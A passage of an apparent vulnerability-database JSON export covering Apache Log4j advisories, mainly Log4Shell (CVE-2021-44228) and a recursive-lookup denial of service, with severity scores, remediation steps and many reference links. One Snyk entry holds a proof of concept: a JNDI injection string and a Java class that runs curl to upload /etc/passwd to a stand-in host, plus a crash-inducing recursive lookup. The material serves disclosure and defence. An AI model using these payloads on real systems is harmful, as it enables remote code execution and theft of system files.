Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml)\n",
"aliases": [
"SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339",
"SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014",
"SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720"
],
"severities": [
{
"type": "cvss3",
"source": "Snyk",
"score": 10,
"additional": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H"
}
],
"references": [
{
"type": "Apache Jira Issues",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3198"
},
{
"type": "Apache Jira Issues",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3201"
},
{
"type": "Apache Pony Mail",
"url": "https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f"
},
{
"type": "Apache Security Advisory",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"type": "Apache Security Page",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"type": "CISA - Known Exploited Vulnerabilities",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"type": "Exploit DB",
"url": "https://www.exploit-db.com/exploits/51183"
},
{
"type": "GitHub Commit",
"url": "https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16"
},
{
"type": "GitHub PR",
"url": "https://github.com/apache/logging-log4j2/pull/608"
},
{
"type": "Jira Issue",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3293"
},
{
"type": "Nuclei Templates",
"url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml"
},
{
"type": "Nuclei Templates",
"url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml"
},
{
"type": "Openwall Mail",
"url": "https://www.openwall.com/lists/oss-security/2021/12/28/1"
},
{
"type": "PoC",
"url": "https://github.com/Kirill89/log4shell-vulnerable-server"
},
{
"type": "Snyk Blog and Vulnerability Breakdown",
"url": "https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/"
},
{
"type": "Twitter Post",
"url": "https://twitter.com/marcioalm/status/1471740771581652995"
}
]
},
{
"origin": "osv",
"id": "GHSA-jfh8-c2jp-5v3q",
"modified": "2023-09-19T22:31:08.390693Z",
"published": "2021-12-10T00:40:56Z",
"withdrawn": null,
"summary": "Remote code injection in Log4j",
"details": "# Summary\n\nLog4j versions prior to 2.16.0 are subject to a remote code execution vulnerability via the ldap JNDI parser.\nAs per [Apache's Log4j security guide](https://logging.apache.org/log4j/2.x/security.html): Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.16.0, this behavior has been disabled by default.\n\nLog4j version 2.15.0 contained an earlier fix for the vulnerability, but that patch did not disable attacker-controlled JNDI lookups in all situations. For more information, see the `Updated advice for version 2.16.0` section of this advisory.\n\n# Impact\n\nLogging untrusted or user controlled data with a vulnerable version of Log4J may result in Remote Code Execution (RCE) against your application. This includes untrusted data included in logged errors such as exception traces, authentication failures, and other unexpected vectors of user controlled input. \n\n# Affected versions\n\nAny Log4J version prior to v2.15.0 is affected by this specific issue.\n\nThe v1 branch of Log4J which is considered End Of Life (EOL) is vulnerable to other RCE vectors so the recommendation is to still update to 2.16.0 where possible.\n\n## Security releases\nAdditional backports of this fix have been made available in versions 2.3.1, 2.12.2, and 2.12.3\n\n## Affected packages\nOnly the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatibility if in use.\n\n# Remediation Advice\n\n## Updated advice for version 2.16.0\n\nThe Apache Logging Services team provided updated mitigation advice upon the release of version 2.16.0, which [disables JNDI by default and completely removes support for message lookups](https://logging.apache.org/log4j/2.x/changes-report.html#a2.16.0).\nEven in version 2.15.0, lookups used in layouts to provide specific pieces of context information will still recursively resolve, possibly triggering JNDI lookups. This problem is being tracked as [CVE-2021-45046](https://nvd.nist.gov/vuln/detail/CVE-2021-45046). More information is available on the [GitHub Security Advisory for CVE-2021-45046](https://github.com/advisories/GHSA-7rjr-3q55-vv33).\n\nUsers who want to avoid attacker-controlled JNDI lookups but cannot upgrade to 2.16.0 must [ensure that no such lookups resolve to attacker-provided data and ensure that the JndiLookup class is not loaded](https://issues.apache.org/jira/browse/LOG4J2-3221).\n\nPlease note that Log4J v1 is End Of Life (EOL) and will not receive patches for this issue. Log4J v1 is also vulnerable to other RCE vectors and we recommend you migrate to Log4J 2.16.0 where possible.\n\n",
"aliases": [
"CVE-2021-44228"
],
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-7rjr-3q55-vv33"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/logging-log4j2"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2022/Dec/2"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2022/Jul/11"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2022/Mar/23"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/1"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/2"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/3"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/13/1"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/13/2"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/15/3"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf"
},
{
"type": "WEB",
"url": "https://github.com/apache/logging-log4j2/pull/608"
},
{
"type": "WEB",
"url": "https://github.com/cisagov/log4j-affected-db"
},
{
"type": "WEB",
"url": "https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md"
},
{
"type": "WEB",
"url": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228"
},
{
"type": "WEB",
"url": "https://github.com/tangxiaofeng7/apache-log4j-poc"
},
{
"type": "WEB",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3198"
},
{
"type": "WEB",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3201"
},
{
"type": "WEB",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3214"
},
{
"type": "WEB",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3221"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/"
},
{
"type": "WEB",
"url": "https://logging.apache.org/log4j/2.x/changes-report.html#a2.15.0"
},
{
"type": "WEB",
"url": "https://logging.apache.org/log4j/2.x/manual/lookups.html#JndiLookup"
},
{
"type": "WEB",
"url": "https://logging.apache.org/log4j/2.x/manual/migration.html"
},
{
"type": "WEB",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"type": "WEB",
"url": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/"
},
{
"type": "WEB",
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20211210-0007/"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT213189"
},
{
"type": "WEB",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"type": "WEB",
"url": "https://twitter.com/kurtseifried/status/1469345530182455296"
},
{
"type": "WEB",
"url": "https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2021/dsa-5020"
},
{
"type": "WEB",
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html"
},
{
"type": "WEB",
"url": "https://www.kb.cert.org/vuls/id/930724"
},
{
"type": "WEB",
"url": "https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
}
]
},
{
"origin": "snyk",
"id": "GHSA-jfh8-c2jp-5v3q",
"modified": "1970-01-01T00:00:00Z",
"published": "1970-01-01T00:00:00Z",
"withdrawn": null,
"summary": "",
"details": "## Overview\n\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE).\nApache Log4j2 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.\r\n\r\nFrom log4j 2.15.0, JNDI LDAP endpoints are restricted to localhost by default.\r\n\r\n\r\n## PoC\r\nWhen an application uses log4j to log user input, an attacker can exploit this vulnerability, by supplying a malicious string that the application logs - for example, `${jndi:ldap://someurl/Evil}`. This causes the application to execute a malicious class supplied by an attacker’s LDAP server (`someurl/Evil` in this example).\r\n\r\nFor example, the vulnerability can be used to inject this malicious class into an application:\r\n```java\r\npublic class Evil implements ObjectFactory {\r\n @Override\r\n public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {\r\n Runtime.getRuntime().exec(\"curl -F 'file=@/etc/passw‍đ' https://someurl/upload\");\r\n return null;\r\n }\r\n}\r\n```\r\nThis causes the application to disclose the `etc/passwd` file on the system, and send it to a remote attacker.\r\n\r\n## Further Remediation Options\r\nIf upgrading the version is not possible, we strongly recommend mitigating the vulnerability using one of these methods:\r\n\r\n* Remove `JndiLookup.class` from the class path (i.e. `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`). While not pertinent to log4shell, consider also removing `JndiManager`, `JMSAppender` and `SMTPAppender` if you are not using them, as there are unconfirmed reports they could be leveraged in similar attacks in the future.\r\n* Partial mitigation: disable lookups via system properties or environmental variables. If you use log4j >=2.10.0, you can set the system property `LOG4J_FORMAT_MSG_NO_LOOKUPS` or the environmental variable `Dlog4j2.formatMsgNoLookups` to `true`. (RCE is possible in some non-default Pattern Layout configurations that use a Context Lookup or a Thread Context Map pattern.)\r\n\r\n<br>Upgrading your JDK versions is not enough to mitigate this vulnerability in all circumstances, as it was proven that setting the `com.sun.jndi.ldap.object.trustURLCodebase` property to `false` is not enough.\r\n<br>For more remediation advice, please visit the [Log4j Remediation Cheat Sheet](https://snyk.io/blog/log4shell-remediation-cheat-sheet/) post.\r\n\r\n\r\n**Note**: `org.apache.logging.log4j:log4j-api` was originally deemed vulnerable, but Apache maintainers have since [clarified](https://issues.apache.org/jira/browse/LOG4J2-3201) that this only affects `org.apache.logging.log4j:log4j-core`.\n\n## Remediation\n\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.15.0 or higher.\n\n\nUse [this guide](https://snyk.io/blog/find-fix-log4shell-quickly-snyk/) to scan your projects for the Log4Shell vulnerability.\n\n## References\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3198)\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3201)\n\n- [Apache Security Advisory](https://logging.apache.org/log4j/2.x/security.html)\n\n- [GitHub PR](https://github.com/apache/logging-log4j2/pull/608)\n\n- [PoC](https://github.com/Kirill89/log4shell-vulnerable-server)\n\n- [Snyk Blog and Vulnerability Breakdown](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/)\n\n- [Exploit DB](https://www.exploit-db.com/exploits/51183)\n\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml)\n",
"aliases": [
"SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720"
],
"severities": [
{
"type": "cvss3",
"source": "Snyk",
"score": 10,
"additional": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H"
}
],
"references": [
{
"type": "Apache Jira Issues",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3198"
},
{
"type": "Apache Jira Issues",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3201"
},
{
"type": "Apache Security Advisory",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"type": "CISA - Known Exploited Vulnerabilities",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"type": "Exploit DB",
"url": "https://www.exploit-db.com/exploits/51183"
},
{
"type": "GitHub PR",
"url": "https://github.com/apache/logging-log4j2/pull/608"
},
{
"type": "Nuclei Templates",
"url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml"
},
{
"type": "PoC",
"url": "https://github.com/Kirill89/log4shell-vulnerable-server"
},
{
"type": "Snyk Blog and Vulnerability Breakdown",
"url": "https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/"
}
]
},
{
"origin": "snyk",
"id": "CWE-400",
"modified": "1970-01-01T00:00:00Z",
"published": "1970-01-01T00:00:00Z",
"withdrawn": null,
"summary": "",
"details": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). Does not protect against uncontrolled recursion from self-referential lookups. \r\n\r\nWhen the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, `$${ctx:loginId}`), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a `StackOverflowError` that will terminate the process.\r\n\r\n### PoC\r\n\r\nIn `log4j.properties`:\r\n```java\r\nappender.console.type = Console\r\nappender.console.name = console\r\nappender.console.layout.type = PatternLayout\r\nappender.console.layout.pattern = !${ctx:test}! %m%n\r\nrootLogger.level = ALL\r\nrootLogger.appenderRef.file.ref = console\r\n```\r\n\r\nIn `Main.java`:\r\n```java\r\nThreadContext.put(\"test\", \"${::-${ctx:test}}\");\r\nlogger.error(\"boom\"); // Will not be logged\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption - An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.3, 2.17.0 or higher.\n## References\n- [Apache Security](https://logging.apache.org/log4j/2.x/security.html)\n- [JIRA Issue](https://issues.apache.org/jira/browse/LOG4J2-3230)\n",
"aliases": [
"SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524"
],
"severities": [
{
"type": "cvss3",
"source": "Snyk",
"score": 7.5,
"additional": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P"
}
],
"references": [
{
"type": "Apache Security",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"type": "JIRA Issue",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3230"
}
]
}
]
}